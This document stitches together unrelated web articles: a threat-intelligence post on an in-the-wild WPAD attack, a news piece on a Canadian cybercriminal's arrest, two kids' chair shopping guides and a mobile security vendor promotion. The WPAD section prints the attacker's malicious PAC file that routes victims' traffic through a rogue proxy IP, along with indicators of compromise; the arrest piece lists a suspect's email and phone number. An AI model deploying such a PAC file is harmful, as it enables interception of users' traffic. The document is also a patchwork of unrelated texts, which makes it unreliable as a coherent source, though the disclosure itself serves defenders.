In-the-Wild WPAD Attack | How Threat Actors Abused Flawed Protocol For Years

A Guest Post By Daniel Persch, QGroup GmbH, Frankfurt am Main

The possibility of leveraging the Web Proxy Auto-Discovery (WPAD) protocol to conduct MITM (Man-in-the-Middle) attacks has been known for many years and has been described previously. However, until now, there was no known case of it occurring in-the-wild. In this post, we disclose details of such an ITW attack discovered by our incident response specialists at QGroup GmbH, Germany, who successfully investigated and mitigated the attack with the help of the SentinelOne platform.

What is WPAD?

Web Proxy Auto Discovery is a protocol used to ensure all devices on a network use the same web proxy configuration. Rather than having to manually configure each device, network administrators may use WPAD to ease the process. When enabled, WPAD searches for a Proxy Auto-Configuration (PAC) file and applies the configuration automatically.

On a typical router, a default DHCP server is configured to enable easy client connectivity. This DHCP server includes a default domain suffix (for example: example.com) which will be assigned to the clients. Clients within the network retrieve that domain name when connecting via cable or WI-FI to that network together with the IP address from the DHCP server.

After retrieving an IP address and domain suffix via DHCP from a router, if WPAD is enabled and no WPAD URL is explicitly specified by the DHCP server, the OS tries the following URLs to retrieve appropriate proxy settings for the connection:

http://wpad.department.branch.example.com/wpad.dat 
http://wpad.branch.example.com/wpad.dat
http://wpad.example.com/wpad.dat
http://wpad/wpad.dat

The is replaced by the domain suffix assigned by the DHCP server. If a publicly reachable fully-qualified domain name (FQDN) is used, the URL will be requested from the internet accordingly. If an attacker owns the domain that is used by the internal router and the client has WPAD enabled, the attacker can redirect the traffic of internet applications using system proxy settings through the attacker’s proxy.

All the attacker needs to do is to provide a correct PAC file at one of the locations mentioned above, and the client OS will use the configuration on-the-fly without any user interaction.

WPAD Attack Details

We discovered a case where this weakness appears to have been abused for at least three years and is redirecting the internet traffic of users around the world through the attacker’s proxy.

Although more domains could be affected the following analysis is linked to the following domain name:

domain.name

The attacker registered the publicly reachable FQDN and set up a server at wpad.domain.name, hosting a web server on the default TCP-Port 80.

The name was likely chosen in light of the fact that on some home routers, the default DNS domain setting is “domain.name”. The expansion of Top Level Domain names in recent years has made it possible to register domains with the .name TLD, so what may have once been a safe default choice has become subject to a WPAD Name Collision Vulnerability.

In the attack we discovered, the source IP of the victim seems to determine whether the server answers with an empty response or with a WPAD Proxy Auto-Configuration file. An empty response was received when we tried the following command from a German Telekom Address.

$ curl http://wpad.domain.name/wpad.dat

However, when performed using a VPN provider with outgoing IP originating in Malaysia, we received the following PAC file:

$ curl http://wpad.domain.name/wpad.dat 
function FindProxyForURL(url, host) {

	if (isPlainHostName(host) || 
		dnsDomainIs(host, ".windowsupdate.com") || 
		dnsDomainIs(host, ".microsoft.com") || 
		dnsDomainIs(host, ".baidu.com") ||
		dnsDomainIs(host, ".kaspersky.com") || 
		dnsDomainIs(host, ".axaltacs.net") || 
		dnsDomainIs(host, ".live.com") || 
		dnsDomainIs(host, ".drivergenius.com") ||
			isInNet(host, "10.0.0.0", "255.0.0.0") || 
			isInNet(host, "172.16.0.0", "255.255.224.0") || 
			isInNet(host, "192.168.0.0", "255.255.0.0") || 
			isInNet(host, "127.0.0.0", "255.0.0.0"))
		return "DIRECT"; 
	else
		return 'PROXY 185.38.111.1:8080';
}

What we can see here is that the PAC file instructs the client to use the proxy server at the following address:

185.38.111.1:8080

for all addresses except RFC1918, localhost and the following domains:

baidu.com
kaspersky.com
live.com
microsoft.com
windowsupdate.com
axaltacs.net
drivergenius.com

In other versions of this PAC file (see IoCs below), we have also seen the following lines added to the exclusions:

dnsDomainIs(host, ".googlevideo.com")
dnsDomainIs(host, ".youtube.com")

and

dnsDomainIs(host, ".dhl.com")

At the time of our investigation, the embedded IP address was providing an http-proxy over TCP and port 8080.

When using the PAC file with Firefox, we could successfully establish a connection using the proxy specified:


According to VirusTotal, the IP address, 185.38.111.1:8080, is referred to by various known malware files:

The wpad.dat PAC files containing this specific IP proxy address also have a history of being served up by a number of other known malicious sites including

  • stoppblock[.]net/wpad.dat
  • stoppblock[.]org/wpad.dat
  • stoppblock[.]com/wpad.dat
  • access-unstop[.]info/wpad.dat
  • accessquick[.]net/wpad.dat
SHA1: acf3275189948f095f122289d2d6ef44be6ccc4d

Many of these sites are tagged as “known infection source”, “proxy avoidance” and “malware repository, spyware and malware”.

Impact and Recommendations

While this MITM attack via rogue-proxy appears to have been in use for several years, the fact that most web traffic these days is secured with TLS means attackers need to generate certificates that the web browser would trust before they could inspect or redirect interesting traffic.

Some web sites, on the first visit, respond with an HSTS (Strict Transport Security) header that lets the browser know all future requests should always be made over TLS, thus preventing SSL Stripping attacks, a means of forcing an encrypted HTTPS connection to downgrade to insecure HTTP. According to recent data, however, only about 22% of sites are currently using HSTS. Traffic that is neither TLS or HSTS-protected is vulnerable to MITM attacks, and downloads over HTTP are particularly vulnerable to interception by such a rogue-proxy.

For enterprise, it’s likely the domain suffix returned by DHCP while at the office will be a domain whose DNS is controlled by the company, so it would be difficult for an attacker to add a rogue WPAD DNS entry. More commonly, home or public routers using the default “wpad.domain.name” or any other generic TLD (gTLD) name that is subject to a domain name collision could be vulnerable to such a MITM attack.

It is worth noting that in Windows 10, WPAD is enabled by default. In macOS and Linux, this setting is available but disabled by default.

Best practices for protecting against the wider WPAD Name Collision Vulnerability are outlined in this US-CERT advisory and include:

  • Consider disabling automatic proxy discovery/configuration in browsers and operating systems unless those systems will only be used on internal networks.
  • Consider using a registered and fully qualified domain name (FQDN) from global DNS as the root for enterprise and other internal namespace.
  • Consider using an internal TLD that is under your control and restricted from registration with the gTLD program.
  • Configure internal DNS servers to respond authoritatively to internal TLD queries.
  • Configure firewalls and proxies to log and block outbound requests for wpad.dat files.
  • Identify expected WPAD network traffic and monitor the public namespace or consider registering domains defensively to avoid future name collisions.

In our investigation, we were able to search for the malicious IP across all our SentinelOne instances to find a number of affected parties. Our strategic integration of SentinelOne into our security operations processes (SecOps, IR, Analytics) enabled a rapid reaction and allowed us to both immediately protect all of our customers and ad hoc identify which customers had been affected.

Conclusion

The flaws inherent in WPAD have received plenty of attention from security researchers, leading one to suggest renaming it “badWPAD” because the risks it presents stem directly from its design, rather than any faulty configuration or implementation on the network administrator’s side.

Now we know that threat actors have been paying attention, too. Combining malicious PAC files with selective domain name registrations, they have been able to compromise the traffic of internet users for years. Despite various network safeguards such as TLS and HSTS, and software download safeguards such as digital signature verification, there is still plenty of scope for malicious actors to attack unwary organizations and end users via WPAD and unencrypted traffic.

In particular, because home routers with default settings are the most affected, the trend towards remote work and Work From Home caused by the COVID-19 pandemic poses a particular risk given the rise of endpoints outside the protection of the office LAN.

With the evidence presented here of in-the-wild WPAD attacks, those risks must be mitigated by administrators by attending to the recommendations above and ensuring that they have full visibility into network traffic via a modern EDR or XDR platform.

Indicators of Compromise

SHA1 PAC files
acf3275189948f095f122289d2d6ef44be6ccc4d
6e515b52e1726a5a29de137bde03719c0a3daee9
01cb0fe80a03ecbac16f9b98fcaf0b3fce2b6b21

Observed DNS
wpad.domain[.]name
*.domain[.]name
wpad*

IP addresses
185[.]38.111.1
185[.]38.111.4
185[.]38.111.5
185[.]38.111.0/24

Canada Charges Its “Most Prolific Cybercriminal”

A 31-year-old Canadian man has been arrested and charged with fraud in connection with numerous ransomware attacks against businesses, government agencies and private citizens throughout Canada and the United States. Canadian authorities describe him as “the most prolific cybercriminal we’ve identified in Canada,” but so far they’ve released few other details about the investigation or the defendant. Helpfully, an email address and nickname apparently connected to the accused offer some additional clues.

Matthew Philbert, in 2016.

Matthew Philbert of Ottawa, Ontario was charged with fraud and conspiracy in a joint law enforcement action by Canadian and U.S. authorities dubbed “Project CODA.” The Ontario Provincial Police (OPP) on Tuesday said the investigation began in January 2020 when the U.S. Federal Bureau of Investigation (FBI) contacted them regarding ransomware attacks that were based in Canada.

“During the course of this investigation, OPP investigators determined an individual was responsible for numerous ransomware attacks affecting businesses, government agencies and private individuals throughout Canada as well as cyber-related offenses in the United States,” reads an OPP statement.

“A quantity of evidentiary materials was seized and held for investigation, including desktop and laptop computers, a tablet, several hard drives, cellphones, a Bitcoin seed phrase and a quantity of blank cards with magnetic stripes,” the statement continues.

The U.S. indictment of Philbert (PDF) is unusually sparse, but it does charge him with conspiracy, suggesting the defendant was part of a group. In an interview with KrebsOnSecurity, OPP Detective Inspector Matt Watson declined to say whether other defendants were being sought in connection with the investigation, but said the inquiry is ongoing.

“I will say this, Philbert is the most prolific cybercriminal we’ve identified to date in Canada,” Watson said. “We’ve identified in excess of a thousand of his victims. And a lot of these were small businesses that were just holding on by their fingernails during COVID.”

A DARK CLOUD

There is a now-dormant Myspace account for a Matthew Philbert from Orleans, a suburb of Ottawa, Ontario. The information tied to the Myspace account matches the age and town of the defendant. The Myspace account was registered under the nickname “Darkcloudowner,” and to the email address dark_cl0ud6@hotmail.com.

A search in DomainTools on that email address reveals multiple domains registered to a Matthew Philbert and to the Ottawa phone number 6138999251 [DomainTools is a frequent advertiser on this site]. That same phone number is tied to a Facebook account for a 31-year-old Matthew Philbert from Orleans, who describes himself as a self-employed “broke bitcoin baron.”

Mr. Philbert did not respond to multiple requests for comment.

According to cyber intelligence firm Intel 471, that dark_cl0ud6@hotmail.com address has been used in conjunction with the handle “DCReavers2” to register user accounts on a half-dozen English-language cybercrime forums since 2008, including Hackforums, Blackhatworld, and Ghostmarket.

Perhaps the earliest and most important cybercrime forum DCReavers2 frequented was Darkode, where he was among the first two-dozen members. Darkode was taken down in 2015 as part of an FBI investigation sting operation, but screenshots of the community saved by this author show that DCReavers2 was already well known to the Darkode founders when his membership to the forum was accepted in May 2009.

DCReavers2 was just the 22nd account to register on the Darkode cybercrime forum.

Most of DCReavers’s posts on Darkode appear to have been removed by forum administrators early on (likely at DCReavers’ request), but the handful of posts that survived the purge show that more than a decade ago DCReavers2 was involved in running botnets, or large collections of hacked computers.

“My exploit pack is hosted there with 0 problems,” DCReaver2 says of a shady online provider that another member asked about in May 2010.

Searching the Web on “DCreavers2” brings up a fascinating chat conversation allegedly between DCReavers2 and an individual in Australia who was selling access to an “exploit kit,” commercial crimeware designed to be stitched into hacked or malicious sites and exploit a variety of Web-browser vulnerabilities for the purposes of installing malware of the customer’s choosing.

In that 2009 chat, indexed by the researchers behind the website exposedbotnets.com, DCReavers2 uses the Dark_Cl0ud6 email address and actually shares his real name as Matthew Philbert. DCReavers2 also says his partner uses the nickname “The Rogue,” which corresponds to a former Darkode administrator who was the second user ever registered on the forum (see screenshot above).

In that same conversation, DCReavers2 discusses managing a botnet built on ButterFly Bot. Also known as “Mariposa,” ButterFly was a plug-and-play malware strain that allowed even the most novice of would-be cybercriminals to set up a global operation capable of harvesting data from thousands of infected PCs, and using the enslaved systems for crippling attacks on Web sites. The ButterFly Bot kit sold for prices ranging from $500 to $2,000.

An advertisement for the ButterFly Bot.

The author of ButterFly Bot — Slovenian hacker Matjaz “Iserdo” Skorjanc — was Darkode’s original founder back in 2008. Arrested in 2010, Skorjanc was sentenced to nearly five years in prison for selling and supporting Mariposa, which was used to compromise millions of Microsoft Windows computers.

Upon release from prison, Skorjanc became chief technology officer for NiceHash, a cryptocurrency mining service. In December 2017, $52 million worth of Bitcoin mysteriously disappeared from NiceHash coffers. In October 2019, Skorjanc was arrested in Germany in response to a U.S.-issued international arrest warrant for his extradition.

The indictment (PDF) tied to Skorjanc’s 2019 arrest also names several other alleged founding members of Darkode, including Thomas “Fubar” McCormick, a Massachusetts man who was allegedly one of the last administrators of Darkode. Prosecutors say McCormick also was a reseller of the Mariposa botnet, the ZeuS banking trojan, and a bot malware he allegedly helped create called “Ngrbot.” The U.S. federal prosecution against Skorjanc and McCormick is ongoing.

At the time the FBI dismantled Darkode in 2015, the Justice Department said that out of 800 or so crime forums worldwide, Darkode was the most sophisticated English-language forum, and that it represented “one of the gravest threats to the integrity of data on computers in the United States and around the world.”

Some of Darkode’s core members were either customers or sellers of various “locker” kits, which were basically web-based exploits that would lock the victim’s screen into a webpage spoofing the FBI or Justice Department and warning that victims had been caught accessing child sexual abuse material. Victims who agreed to pay a “fine” of several hundred dollars worth of GreenDot prepaid cards could then be rid of the PC locker program.

A 2012 sales thread on Darkode for Rev Locker.

In many ways, lockers were the precursors to the modern cybercrime scourge we now know as ransomware. The main reason lockers never took off as an existential threat to organizations worldwide was that there is only so much money locker users could reasonably demand via GreenDot cards.

But with the ascendance and broader acceptance of virtual currencies like Bitcoin, suddenly criminal hackers could start demanding millions of dollars from victims. And it stands to reason that a great many Darkode members who were never caught have since transitioned from lockers, exploit kits and GreenDot cards to doing what every other self-respecting cybercrook seems to be involved with these days: Locking entire companies and industries for ransomware payments.

One final observation about the Philbert indictment: It’s good to see the Canadian authorities working closely with the FBI on important cybercrime cases. Indeed, this investigation is remarkable for that fact alone. For years I’ve been wondering aloud why more American cybercriminals don’t just move to Canada, because historically there has been almost no probability that they will ever get caught — let alone prosecuted there. With any luck, this case will be the start of something new.

Kids’ rattan chair – stylish and sustainable addition to your interior

Do you fancy beachy, bohemian style? Are you invested in being eco-friendly? If you answered yes, then it’s time to redo your kid’s room and make it look like a little gem. Also, you can make your kid feel even more comfortable in their own room. Even if it’s the baby’s first bedroom, it has to look stylish and cozy at the same time.

So how do you achieve the mission?

First of all, you have to find the perfect kids’ rattan chair for your kid. This piece will instantly bring looks and feelings of the summer season into the room!

Do not be afraid to use bright colors in decorating it. You can paint walls with light blue or pastel green. Then, you just need to add some cute accessories, and you’re done!

Adding a hammock chair to the corner will make the room cozier, and your child can enjoy spending time reading or just taking a nap in it. If there is not enough space for a hammock chair, go for a regular rattan chair.

Rattan furniture is perfect for any kid’s room because it is not only stylish but also eco-friendly. Plus, it is very affordable and easy to clean, which is a bonus!

What is rattan?

Rattan is a natural fiber made from a type of palm tree. It is known for its strength and resistance to wear and tear. Because rattan is a natural fiber, It has been used in Malaysia for over 100 years as traditional furniture.

Rattan is resistant to weather and insects, making it durable for outdoor use. The fibers are woven together to create furniture that is sturdy but also flexible. Rattan can be used without adding harmful chemicals into the environment, making it safe to use in the home.

Rattan chairs are perfect for families that love nature and want their homes to be eco-friendly. It is a versatile material, so if you purchase a rattan chair for your kid, you can also use it for yourself. Why not enjoy some time reading with your child in their new chair?

Where is rattan found?

Rattan can be found in many different countries but is native to Southeast Asia. The rattan palm tree thrives in areas with high humidity and temperatures that don’t fall below 10°C (50°F). As a result, it grows primarily in Indonesia and Malaysia. Other parts of the world, such as Africa, also have rattan trees, but the furniture’s quality is not as good.

How is rattan made?

Rattan is made from the fibers in the rattan palm. The palm tree has large leaves which grow in bunches of six to twelve leaflets, making them look like a feather when they unfurl. The trees can grow 20 meters (65 feet) or more and live for about 25 years.

To make furniture, the bark is removed from the tree and dried in bundles to make rattan strips. These strips can vary in width and length depending on the type of tree and furniture manufacturer. The fibers are soaked in water for 24 to 48 hours before being woven together to create different kinds of furniture, such as chairs, beds, loungers, couches, and tables. One example is rattan chairs, which are often used by kids and adults alike because of their durability and eco-friendly properties.

What is the difference between wicker and rattan?

Wicker is made from the stems of a different type of palm tree, while rattan is made from the fibers in the rattan palm. Rattan is also stronger and more durable than wicker, making it a better choice for furniture. Wicker is often used to make baskets, while rattan can be used to make furniture, flooring, wall paneling, and signs.

Is rattan furniture eco-friendly?

Yes, rattan furniture is eco-friendly. It is made from all-natural materials and does not contain any harmful chemicals. It does not require much energy to produce, allowing manufacturers to create a long-lasting product without harming the environment. The use of rattan furniture can reduce your carbon footprint by saving trees and reducing waste products.

Kids’ rattan chairs – our best picks

Furniture is an essential part of any home, and kids’ furniture is no exception. When it comes to finding the perfect chair for your child, you want something durable, eco-friendly, and stylish. Rattan chairs meet all of these requirements and make a great addition to any kid’s room.

The company called Beachy Mums caught our attention. It has a range of different rattan chairs for kids designed to be both stylish and comfortable. The chairs are made from all-natural materials, making them the perfect choice for kids prone to allergies or asthma.

Here are our top picks for rattan chairs for kids:

Beachy Mums Children’s Handmade Rattan Peacock Chair

This one is a beauty! The rattan material used to make this chair is sourced from Indonesia and crafted by hand. It’s lightweight and easy to move around, making it perfect for any room. It comes with a soft cushion for extra comfort. It is an excellent and stylish choice for kids aged 2-5.

Beachy Mums Rattan Toddler Rainbow Chair

If you’re looking for a rattan chair with a simpler design, this one is a great option. All-natural, sustainable materials are used to produce each one. These beautiful kids’ chairs are handcrafted in Java, Indonesia, and are of excellent quality.

The rainbow pattern makes it a great addition to any children’s space. This chair is ideal for children aged 2 years and older.

Beachy Mums Handmade Vintage Peace Sign Rattan Kid’s Chair

This vintage-style chair is perfect for younger kids. It features a cute peace sign design and is handmade from all-natural materials. The material used is eco-friendly and sustainable, so you know you’re doing the right thing by purchasing it. It is lightweight and easy to move around, making it perfect for any room. This chair is ideal for kids aged 2-5 years old.

Bloomingville Rattan Arm Chair

Time for a chair for both parent and child! This rattan armchair by Danish design company Bloomingville is perfect. It has a simple and stylish design that will complement any home décor. The all-natural rattan material makes it eco-friendly and sustainable. This rattan chair provides a basic yet beautiful bohemian design and a lighthearted atmosphere to the area. It is an excellent piece of Scandinavian design!

Where can I use my rattan furniture?

Rattan furniture is designed to be used on patios and backyards, but it also works inside the home. Rattan chairs add a touch of class to any room, especially if the chairs are used as part of a larger rattan furniture set. Rattan sofas and couches can be used in living rooms, dens, and bedrooms. The material’s natural properties make it easy to blend with any color scheme or theme. Rattan also matches well with wood or other types of furniture.

When should I replace my rattan furniture?

Rattan chairs are designed to last for years, but they can be damaged if left outside through harsh conditions such as rain and snow. To prevent your chair from getting damaged, cover it with a tarp or leave it inside when you’re not using it. If your chair does get damaged, you can usually repair it by using a rattan furniture repair kit.

How do I clean my rattan furniture?

Rattan furniture is easy to clean and does not require any special care. You can simply use a damp cloth to wipe away dirt and dust. If there is a spill, use a dry cloth to blot the liquid and then wipe with a wet cloth. Do not use any type of soap or cleaning agent, as this may damage the furniture. For more thorough cleaning, you can use a vacuum cleaner or soft-bristled brush to remove any dirt or dust that may be trapped in the fibers.

Are there any health risks associated with rattan furniture?

There are no known health risks associated with rattan furniture. The material is made from natural fibers and does not contain harmful chemicals or toxins. Rattan is also resistant to mold and mildew, making it a safe choice for people with allergies or asthma.

Conclusion

Rattan furniture is an excellent choice for any home. It has a simple and stylish design that will complement any décor. The all-natural rattan material is eco-friendly and sustainable, making it a responsible choice for your home. Rattan furniture is both durable and easy to maintain. Rattan chairs are designed for comfort, but the material also gives the room a lighthearted atmosphere.

The post Kids’ rattan chair – stylish and sustainable addition to your interior appeared first on Comfy Bummy.

Mobile Threat Defense | Bringing AI-Powered Endpoint Security To Your Mobile Devices

A Guest Post by Shridhar Mittal, CEO of Zimperium

For the past few decades, corporations have spent considerable time and resources investing in security solutions for traditional endpoints and the infrastructure to which these devices connect. The focus has been on the devices their employees and customers use to connect to their services or workflows.

Modern workflows have evolved and grown, and as a result, new devices have been introduced into the enterprise environment. Many organizations big and small accepted these tablets and phones into their systems in the spirit of productivity, but have dedicated little thought as to how these devices might impact their attack surface.

The Rise of Mobile in the Enterprise

Over the last two years, the modern workforce has changed the face of enterprise security needs, pushing the envelope of technology, access, and capabilities for workers connecting into corporate systems all around the world. Far outside the scope of the physical corporate perimeters and the security within, these new workflows have done more than increase distributed efficiency; they have increased the modern enterprise attack surface to a scale many enterprises were not prepared to handle.

In the context of these last two years and the rapid transformation to work that they represented, mobile devices became utterly critical assets. From replacing the encrypted token keys of the past with two-factor authentication (2FA) apps, to enabling Microsoft Office 365 and other workforce productivity applications for mobile access, the phones and tablets adorning the desks of employees around the world were now part of the core enterprise technology ecosystem in a way they just had not been previously.

These devices are not all corporate-owned either. According to the Verizon Mobile Security Index 2021, 70% of organizations adopted BYOD policies to support the distributed worker. It must be stated explicitly: this means that enterprise data is being accessed, downloaded, and transferred to all of these devices, many of which are personally owned.

And this is not a flash in the pan. The reliance on the mobile endpoint is here to stay. According to the Verizon Mobile Security Index 2021, 71% of enterprises consider mobile to be very critical to business, a trend that rapidly accelerated due to the global pandemic. But with this heavy reliance comes a major shift in the total attack surface for each of these enterprises, and yet far too many still lack even the basic security afforded to more traditional endpoints.

Unprotected Mobiles Increase Your Attack Surface

With this sharp uptick in mobile reliance and usage, attackers have turned their focus to unsecured mobile devices, ripe with corporate system connections, personal and private data, and a low risk of being caught. Many recent headlines demonstrate these attacks are not just small data leaks. Instead, enterprises are faced with zero-day and zero-click vulnerabilities designed to target mobile devices to steal or spy on unsuspecting users. With the average user unaware of the risks to their devices, many of these attacks are more successful than even malicious actors anticipated.

According to Google’s Project Zero, so far in 2021 Android and iOS have accounted for 31% of all zero-day, in the wild vulnerabilities used in real attacks against real users (18 out of 58). This is a sharp uptick over 2020 where mobile-only accounted for 11% (3 out of 26).

Maddie Stone and Clement Lecigne of Google’s Threat Analysis Group attribute this sharp rise in attacks and the changing attack surface to the earlier mentioned reliance and aforementioned growth of mobile throughout the world.

“The growth of mobile platforms has resulted in an increase in the number of products that actors want capabilities for.” – Maddie Stone & Clement Lecigne, Google Threat Analysis Group, 2021

When you start thinking about enterprise data and security, the bottom line is mobile endpoints pose a great risk. From BYOD policies to Office 365, compliance mandates like HIPAA, PCI, or NERC, enterprises need to mandate security on all endpoints, including mobile just like traditional endpoints. There is no difference if an employee has data sitting on a laptop or a tablet; it’s one and the same.

From the rise of man-in-the-middle attacks targeting endpoints to misconfigured apps leaking critical information, it’s not just malware that is threatening mobile security. These relied-upon mobile endpoints and the data they are connected to through enterprise apps and services are left at risk due to vulnerable operating systems, malicious and poorly secured apps, and phishing. Rogue and compromised networks, an increasing number of apps with cross-functionality, and even mobile-malware complexity mirroring traditional threats continue to introduce risks to mobile endpoints and apps.

MDM Is No Substitute For Mobile Threat Defense

Over the last few years, many enterprises have turned to mobile device management (MDM) solutions to provide minimal aircover over their iOS and Android devices. When the threat was minimal, these solutions made sense as they could detect changes in the OS or delete corporate data in the event of a lost or stolen device.

But MDMs are not fit to fulfill the security needs of the modern enterprise, lacking the security controls, protections, and capabilities necessary to stand up against advanced threats. MDM solutions are the start of a cohesive mobile security strategy, but MDM cannot be relied upon as the only layer protecting enterprises from the growing mobile threat.

Protect Your Mobile Endpoints with MTD

The modern threat requires a modern security solution to stay ahead of the hacks and malware, minimizing the attack surface. Mobile threat defense (MTD) is enterprise security designed to stay ahead of the attackers, providing the visibility and confidence that IT and security teams need as more mobile endpoints connect into the corporate network.

The mobile endpoint’s security posture connected to corporate networks, both managed and unmanaged, needs to be addressed to avoid any of these devices becoming the starting point for a much larger security incident.

Properly configured and integrated, advanced MTD solutions can enhance existing zero-trust controls by providing mobile device risk attestation. This integration and extended security capabilities are vital to shoring up defenses for enterprises evolving from EPP to XDR security solutions. Advanced MTD solutions provide the features, workflow, and capability that complement XDR capabilities on mobile devices.

IT and security leaders responsible for their enterprise’s mobile endpoint security should be aware that purpose-built mobile security applications are designed to do more than prevent attacks and bring a whole host of other advanced security features to the mobile devices. While legacy mobile security tools do exist, they lack the advanced approach to mobile endpoint security necessary to keep up with modern-day threats.

“MTD products not only prevent attacks but also detect and remediate them. MTD focuses on identifying and thwarting malicious threats, rather than relying on device management configuration to protect against simple user mistakes.

[We] see no value in adopting antivirus solutions that do not provide behavioral anomaly prevention and detection, as the underlying mobile platforms already perform signature-based scans to look for malware.” – Gartner Market Guide for Mobile Threat Defense, March 2021

Integrating Mobile Threat Defense and XDR

With MTD and XDR coming together, organizations are taking a step into the future of complete endpoint security, addressing all the devices from the phone in the pocket to the desktop in the office with advanced security solutions. The alliance between Zimperium and SentinelOne addresses the complete endpoint attack surface, delivering critical security controls to security teams and protection to employees near and far.

By powering the brand new SentinelOne SingularityTM Mobile application added to the lineup, SentinelOne is now providing complete endpoint coverage and protection with the most advanced endpoint security solutions on the market, covering Android, ChromeOS, iOS, macOS, Linux, Windows and Windows Server operating systems, as well as IoT devices and Cloud workloads.

Conclusion

SentinelOne SingularityTM Mobile customers can now manage mobile device security alongside their user workstations, cloud workloads, and IoT devices. SingularityTM Mobile brings behavioral AI-driven protection, detection, and response directly to iOS, Android, and ChromeOS devices. Part of the Singularity Platform, SentinelOne delivers mobile threat defense that is local, adaptive, and real-time, to thwart mobile malware and phishing attacks at the device, with or without a cloud connection.

Singularity Mobile
Combat the Rising Tide of Threats

About Zimperium

Zimperium, the global leader in mobile security, offers the only real-time, on-device, machine learning-based protection against Android, iOS, and Chromebook threats. Powered by z9, Zimperium provides protection against the device, network, phishing, and malicious app attacks.


Kids’ floor chair – a versatile sitting alternative that will leave you floored

Children should be allowed to play and learn in a safe environment. The chairs should be healthy for children to use, and the furniture industry has looked into making chairs especially for kids. The first task was to create a comfortable chair for children of all sizes.

However, not every child likes to sit in a chair. Some of them don’t like it at all! These children would rather sit cross-legged on the floor or lay down and play on a carpet. This is where a new solution was needed.

The function of kids’ floor chair

The task was not easy, and it took a long time before the first children’s floor chairs were ready for sale. In the 70s, several different types of these chairs were designed and made in Denmark, Sweden, and Germany. They have been on sale since the early 1980s under different names.

Many companies have their versions of kids’ floor chairs in modern times, but the primary purpose is still the same – to offer a comfortable and safe place for children to sit and play. The chair can also be used as a place for children to take a nap or rest.

One of the great things about kids’ floor chairs is that they can be used anywhere. They are perfect for use in classrooms, daycares, and homes. They can also double as a temporary bed for little guests.

However, some parents are skeptical of the idea of floor chairs, claiming it’s not a healthy option for children to use because it does not help with posture. But is that the truth?

According to the pediatric physical therapist Jen O’Brien, “There are lots of benefits to using a floor chair rather than a traditional seated chair. First and foremost, it allows kids to move and stretch their bodies throughout the day, crucial for developing strong muscles and bones. Floor chairs also encourage kids to use their imaginations and creativity, as they can use the chairs for all sorts of activities – from reading and coloring to playing pretend games.”

The truth is that kids’ floor chairs are intended to be used temporarily. Children often move around or stand up while using the floor chairs, so it’s not likely for them to develop poor posture.

So, it would seem that the benefits of kids’ floor chairs outweigh any negatives. They are safe, comfortable and promote creativity and movement, all essential for healthy development. If you are looking for an alternative to traditional seating options for your child, a floor chair is a great option to consider.

What are the best kids’ floor chairs?

Parents are searching for the best kids’ furniture to make their children happy! As for choosing, there are many styles and brands of floor chairs on the market. However, our article will focus only on the best kids’ floor chairs that you can easily find online. The common thing is that they are safe, comfortable to sit on, durable, easy to use, and versatile!

Crestlive Products Floor Chair

This floor chair is available in two colors (blue and grey) and has five adjustable positions. This will help the child to use it for a more extended time. This floor chair features a flexible design that lets you lay the chair flat to sleep, lounge, watch your favorite movie, or play board games at 90°.

The Crestlive Products’ Floor Chair is designed with a breathable cotton fabric cover for a pleasant seat on any surface. The ergonomic design, which is highly resilient, adapts to your childs’ physique for a comfortable chair.

This floor chair is convenient too: it can be easily stored under a bed or tall couch. The floor chair cover is removable for washing. The unique reverse zipper on the cover prevents the floor from being scratched. Also, your child can store various items while reading or playing board games thanks to the back pocket.

Bonvivo Easy II Folding Floor Chair

This floor chair is perfect for children and adults who need a temporary seat. The Bonvivo Easy II Folding Floor Chair is ideal for use at home, office, or special events.

The chair can be folded for easy storage, perfect for small spaces. It is also lightweight, making it easy to transport. The chair is made of high-quality materials, making it durable and long-lasting. The fabric is also breathable, ensuring that the child remains comfortable while sitting.

The Bonvivo Easy II Folding Floor Chair is a perfect option for any parent or caretaker who wants to ensure that their child is happy and comfortable while seated.

OTTERLEAd Super Soft Floor Chair

OTTERLEAd Super Soft Floor Chair is comfy like no other – designed with high-density memory foam and soft plush fabric; thickened flannelette cushions will make you feel comfortable when sitting on the floor.

Both kids and adults will enjoy sitting on the floor with this comfy seat. It is perfect for reading, studying, watching TV and more!

The chair is portable and lightweight, making it easy to carry and move around everywhere. The OTTERLEAd Super Soft Floor Chair is a perfect choice for anyone who wants a comfortable and versatile floor chair.

FLOGUOR Foldable Floor Chair with Armrests and Pillow

The most expensive from the list and the most original of the bunch! The FLOGUOR Foldable Floor Chair with Armrests and Pillow is perfect for both kids and adults. The chair is made of high-quality materials, making it durable and long-lasting.

What’s so special about this floor chair is that it combines a soft pillowy design with the features of a traditional chair. It has an ergonomic design for comfort and support, which is perfect for kids. The chair features armrests for added relaxation, making it equally suitable for adults. FLOGUOR Foldable Floor Chair functions as 4 different products: a chair, a sofa, a recliner, and a bed.

Malu Luxury Padded Floor Chair with Back Support

The Luxury Padded Floor Chair by Malu is a super-comfortable foam-padded chair with an adjustable backrest that can be set to five distinct positions.

The Malu Chair is ideal for children and adults of all ages. It’s perfect for playing video games or even working from home! It’s a fantastic addition to your home, especially since it can serve as an extra seat or bed while having visitors.

Malu’s floor chair is also suitable to use outdoors. It is a great way to enjoy activities like sports events, relaxing or meditating in the park, camping, or just hanging out at the beach! The Malu floor chair even features an adjustable strap to make it convenient to transport.

The vegan leather on Malu Chair is perfect for blending in with any décor style. It’s effortless to keep clean and looks great with every aesthetic. Just remove the cover and wash it in the washing machine!

FLOGUOR Indoor 5-Position Adjustable Floor Chair with Back Support

The FLOGUOR Indoor 5-Position Adjustable Floor Chair with Back Support is a resilient chair designed for superior comfort. Constructed with high-quality materials, this floor chair guarantees a long life of perfect use!

With its ergonomic design and adjustable back support, the FLOGUOR Indoor 5-Position Adjustable Floor Chair is perfect for people of all ages. It is an excellent addition to playrooms, bedrooms, or even conference rooms!

The chair is also lightweight and portable, making it easy to move around. The FLOGUOR Indoor 5-Position Adjustable Floor Chair is a perfect choice for anyone who wants a comfortable and versatile floor chair at a reasonable price.

LAYBACK Floor Chair with Back Support

With a LAYBACK floor chair, you can just… lay back and enjoy! Relax and unwind as you watch, chat, play video games, or read a thrilling novel in this exquisite recliner.

This floor chair is adjustable and includes five reclining positions, so it’s suitable for a wide range of people and styles. You can sit just as you like it! The LAYBACK chair is made of high-quality materials, making it a durable and reliable choice for years to come. It is the floor chair option you don’t want to miss out on!

What is better for kids: sitting in a chair or on the floor?

There is no easy answer to this question, as it depends on the individual child. Some children feel more comfortable sitting in a chair, while others prefer to sit on the floor.

